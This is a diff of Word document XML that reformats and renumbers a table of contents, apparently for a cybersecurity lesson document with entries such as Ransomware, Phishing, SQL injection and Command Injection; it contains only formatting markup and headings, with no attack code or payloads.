               </w:rPr>
@@ -521,7 +501,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -536,16 +515,16 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747824" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154857" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
                 <w:lang w:val="en-AS"/>
               </w:rPr>
@@ -553,7 +532,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -561,7 +539,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -569,22 +546,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747824 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154857 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -592,15 +566,13 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -615,24 +587,22 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747825" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154858" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>Lesson 1.3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -640,7 +610,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -648,22 +617,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747825 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154858 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -671,15 +637,13 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -694,24 +658,23 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747826" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154859" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>Phishing</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -719,7 +682,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -727,22 +689,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747826 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154859 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -750,15 +709,13 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -773,16 +730,159 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747827" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154860" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Phishing</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154860 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc114154861" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Lesson 2.2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154861 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc114154862" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
                 <w:lang w:val="en-AS"/>
               </w:rPr>
@@ -790,7 +890,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -798,7 +897,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -806,22 +904,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747827 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154862 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -829,7 +924,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -837,7 +931,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -852,16 +945,16 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747828" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154863" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
                 <w:lang w:val="en-AS"/>
               </w:rPr>
@@ -869,7 +962,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -877,7 +969,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -885,22 +976,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747828 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154863 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -908,15 +996,13 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -931,23 +1017,22 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747829" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154864" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
               </w:rPr>
               <w:t>Path Traversal</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -955,7 +1040,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -963,22 +1047,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747829 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154864 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -986,15 +1067,13 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1009,23 +1088,22 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747830" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154865" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
               </w:rPr>
               <w:t>Brute Force</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1033,7 +1111,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1041,22 +1118,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747830 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154865 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1064,15 +1138,13 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1087,23 +1159,22 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747831" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154866" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
               </w:rPr>
               <w:t>SQL injection</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1111,7 +1182,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1119,22 +1189,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747831 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154866 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1142,15 +1209,13 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>18</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1165,23 +1230,22 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747832" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154867" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
               </w:rPr>
               <w:t>Command Injection</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1189,7 +1253,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1197,22 +1260,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747832 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154867 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
